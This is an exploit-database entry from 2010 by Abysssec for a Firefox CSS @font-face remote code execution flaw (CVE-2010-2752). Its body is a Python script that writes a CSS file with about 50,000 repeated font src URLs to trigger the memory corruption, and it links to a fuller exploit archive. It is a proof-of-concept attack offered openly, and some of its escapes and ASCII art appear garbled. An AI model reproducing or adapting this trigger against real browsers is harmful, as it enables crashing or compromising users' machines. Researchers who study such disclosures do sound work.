MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
# Published : 2010-09-25
# Author : Abysssec
# Previous Title : RarCrack 0.2 Buffer Overflow Proof Of Concept
# Next Title : VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit

'''
  __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ < 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

 http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/
 http://www.exploit-db.com/sploits/moaub-25-exploit.zip
 
'''

'''
  Title             :  Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
  Version           :  Firefox
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.mozilla.com
  Impact            :  Crirical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-2752
  
'''

import sys;

myStyle = """
  @font-face {
    font-family: Sean;
    font-style:  normal;
    font-weight: normal;
    src: url(SEAN1.eot);
    src: url('type/filename.woff') format('woff')

"""
i=0
while(i<50000):
    myStyle = myStyle + ",url('type/filename.otf') format('opentype')n";
    i=i+1

myStyle = myStyle + ",url('type/filename.otf') format('opentype');n";
myStyle = myStyle + "}n";
cssFile = open("style2.css","w")
cssFile.write(myStyle)
cssFile.close()